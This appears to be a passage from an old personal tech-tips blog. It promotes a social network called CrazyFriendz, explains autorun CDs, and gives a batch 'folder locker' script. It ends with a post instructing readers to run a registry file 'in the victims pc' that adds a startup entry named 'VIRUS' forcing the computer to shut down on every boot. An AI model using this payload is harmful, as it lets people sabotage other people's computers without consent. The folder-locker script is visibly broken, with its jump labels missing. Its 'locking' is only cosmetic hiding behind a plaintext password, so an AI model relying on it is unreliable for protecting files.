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Thursday, November 26, 2009

Voizle - Sitemeter


Voizle - Site Meter

Monday, October 12, 2009

Saturday, July 11, 2009

Friday, October 31, 2008

CrazyFriendz - Online Social Networking Site


A new Growing Social networking site

CrazyFriendz is an online community that connects people with all their friends and allow them to make new friends. You can also share your photos & interests with you growing network of friends. CrazyFriendz also allows you to create and join online clubs to discuss/share your views on a wide variety of topics.
Some of the main features of the site :
1. Speed
2. Privacy (user level privacy)
3. Personal URL for each user
4. Instant Notifications (Visitors, Online Friendz, Scrubblez )
5. Hidden Scrubblez
6. Online Gaming (Solo Poker)
7. Questionz & Answerz
8. Bulletinz
9. Watcher
10. Pointz system
11. Arrange Profile and Home Page
12. Save & Logout

Features of Crazy Friendz

Ø Stay in touch with friendz and make new friendz
Ø Communicate with friendz using Scrubblez
Ø Hide Scrubblez
Ø Set your online status as Available or Invisible
Ø View Online Users (Their names are displayed in Green Colour)
Ø Upload and Share Photoz
Ø Create your profile and add themez to change the appearance of CrazyFriendz as per your wish
Ø Add/Update profile information like General, Professional, Personal and Education
Ø Provide your current status with an expression of your choice in your profile
Ø Create your own Personal URL in crazyfriendz which can be accessed without logging into crazyfriendz
Ø Upload up to 5 photoz in “change profile photo” option and make it random day wise or select a single profile photo
Ø Get Instant Notification about new visitorz, online friendz and scrubblez anywhere in the website
Ø Send Scrubblez to online friendz from any page in the website using the instant notification facility. (can be used for chatting)
Ø Invite your friendz from Gmail and Yahoo address bookz
Ø Get Headlinez about your friendz & clubz
Ø More Friend Focus : Increase your network of friendz by adding users that your friendz are adding to their friendz list by viewing friendz headlinez.
Ø Increase your network of friendz by viewing the new joinerz list and recommended friendz list
Ø Arrange your Profile & Home page by moving modules horizontally and vertically
Ø Get Pointz for making new friendz, inviting friendz, playing gamez in funzone or for just logging in everyday
Ø Use Pointz to play gamez in FunZone
Ø Solo Poker game is provided now in FunZone where you can win pointz
Ø Get FunZone Headlinez also of the gamez your friendz are playing
Ø Rankerz : Check your Rank among your friendz in different areas like no of hitz, friendz, clubz or pointz.
Ø Create/Join clubz to share/discuss on topics of interest and also to find new friendz having similar interests
Ø Create Forumz and Pollz in clubz
Ø Watcher : To keep track of your favourite forumz and pollz
Ø Create and Participate in Fame-X
Ø Create an election for moderator in clubz for which all users can vote
Ø Manage Clubz : Transfer Ownership, Ban/Remove Members, Delete Post/Replies
Ø Invite Friendz to join clubz
Ø View Friendz in clubz
Ø Report Abuse about any club or user
Ø Bulletinz : To make all your friendz aware of some newz or updatez. Forward facility provided in Bulletinz
Ø Male Profile photos are displayed with blue border
Ø Female profile photos are displayed with pink border
Ø View Recently Added Friendz list
Ø View Recent Visitorz with time
Ø View New Clubz and Recommended Clubz to join
Ø View Birthday Reminders
Ø Rate your friendz
Ø Set General, Non-Friendz and user-level privacy
Ø Get Notification through Email
Ø Use “Save & Logout” feature so that the next time you login, you start from the page you left the last time
Ø Use Editor to write Scrubblez in different stylez
Ø Create labelz in Scrubblez to distinguish between them
Ø Spam facility provided along with scrubblez
Ø Search facility provided in scrubblez
Ø “Send to many” feature provided to send scrubblez to multiple friendz
Ø Organize friendz into Groupz
Ø Bookmark profilez that you like
Ø View Mutual Friendz and Online Friendz of any user
Ø Friendz and clubz Search facility with advanced settings(filters)

And many more... Join now...

Website URL : http://www.crazyfriendz.com


Saturday, September 1, 2007

Make a Autorun CD


If you wanna make a autorun file for that CD you are ready to burn just read this...

1) You open notepad

2) now you writ: [autorun]

Now save it but not as a .txt file but as a .inf file.

But remember! The "Setup_filename.EXE" MUST be replaced with the name of the setup file. And you also need to rember that it is not all of the setup files there are called '.exe but some are called '.msi

3) Now burn your CD with the autorun .inf file included.

4) Now set the CD in you CD drive and wait for the autorun to begin or if nothing happens just double-click on the CD drive in "This Computer"

reply for ur queries



Copy the following prgram:

title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
echo Invalid password
goto end
md Locker
echo Locker created successfully
goto End

* Now paste it in notepad.

* Save it as batch file(with extension .bat).Any name will do.

* Now you see a batch file. Double click it to create a folder locker.

* A new folder named Locker would be formed at the same location.

* Now brings all the files you want to hide in the locker folder.

* Now double click the batch file to lock the folder namely Locker.

* If you want to unlock your files,double click the batch file again and you would be prompted for password.Enter the password and enjoy access to the folder.

Wednesday, July 4, 2007

Shutdown your friend's computer everytime it start


Thats really easy.

put this followin text in a .reg file and run it in the victims pc:

Windows Registry Editor Version 5.00

"VIRUS"="%windir%\\SYSTEM32\\SHUTDOWN.EXE -t 1 -c \"Howz this new Virus ah\" -f"

DONT PUT IT IN UR COMPUTER, I AM NOT RESPONSIBLE, if it happens, to you, start windows in safe mode, and open registry editor by typiing REGEDIT in start->run. navigate to [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]and remove the string value named VIRUS, restart you computer.

You can also put this in a javascript code, just add this code to your webpage:

Be careful, a drawback of the js code is that NORTON ANTIVIRUS's script blocking feature may block this

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